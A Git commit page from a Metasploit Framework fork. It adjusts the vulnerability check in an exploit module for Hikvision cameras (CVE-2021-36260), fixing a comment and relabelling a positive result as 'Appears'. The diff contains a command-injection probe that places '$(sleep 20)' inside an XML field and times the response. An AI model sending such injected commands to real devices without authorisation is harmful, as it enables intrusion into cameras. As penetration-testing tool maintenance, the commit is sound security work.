dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Change CheckCode to Appears

This commit is contained in:
Jake Baines 2022-02-25 08:32:06 -08:00
parent 9f05a7d11a
commit 2bec5c425f
No known key found for this signature in database
GPG Key ID: 83126B7FC6B116A6
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/exploits/linux/http/hikvision_cve_2021_36260_blind.rb
View File

@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
return CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500)
# Some cameras are not vulnerable and still respond 500. We can weed them out by making
# the remote target sleep and use a low timeout. This might not be good for low latency targets
# the remote target sleep and use a low timeout. This might not be good for high latency targets
# or for people using Metasploit as a vulnerability scanner... but it's better than flagging all
# 500 responses as vulnerable.
payload = '<xml><language>$(sleep 20)</language></xml>'
@ -132,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
'data' => payload
}, 10)
return CheckCode::Vulnerable('It appears the target executed the provided sleep command.') unless res
return CheckCode::Appears('It appears the target executed the provided sleep command.') unless res
CheckCode::Safe('The target did not execute the provided sleep command.')
end